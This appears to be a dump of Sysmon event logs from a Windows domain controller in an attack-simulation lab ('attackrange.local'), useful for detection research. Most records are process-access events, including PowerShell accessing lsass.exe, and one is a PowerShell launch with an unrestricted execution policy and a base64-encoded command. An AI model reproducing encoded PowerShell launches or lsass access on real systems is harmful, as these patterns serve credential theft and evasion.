15:52:10.095{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003357Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.095{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CAA-5FA1-A300-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003356Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.095{D28789B6-7CA9-5FA1-A200-000000008801}43801356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CAA-5FA1-A300-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319332ed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318854ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30d949de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30df2ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd63a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dc8328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd485b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd444e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dd3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+318854ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dbaca9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30dba279(wow64) 154100x80000000000000003355Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.107{D28789B6-7CAA-5FA1-A300-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA9-5FA1-1A91-060000000000}0x6911a0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CA9-5FA1-A200-000000008801}4380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000003354Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.048{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CA9-5FA1-A200-000000008801}4380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003353Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.048{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CA9-5FA1-A200-000000008801}4380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003352Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.001{D28789B6-7CA9-5FA1-A200-000000008801}4380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_v3ucq5t3.2dz.ps12020-11-03 15:52:10.001 10341000x80000000000000003351Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.001{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CA9-5FA1-A200-000000008801}4380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003451Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.927{D28789B6-7CA9-5FA1-A000-000000008801}46365092C:\Windows\system32\conhost.exe{D28789B6-7CAB-5FA1-A800-000000008801}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003450Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.927{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003449Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.927{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003448Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.927{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003447Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.927{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003446Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.927{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003445Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.927{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003444Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.927{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003443Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.927{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003442Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.927{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CAB-5FA1-A800-000000008801}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003441Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:11.927{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 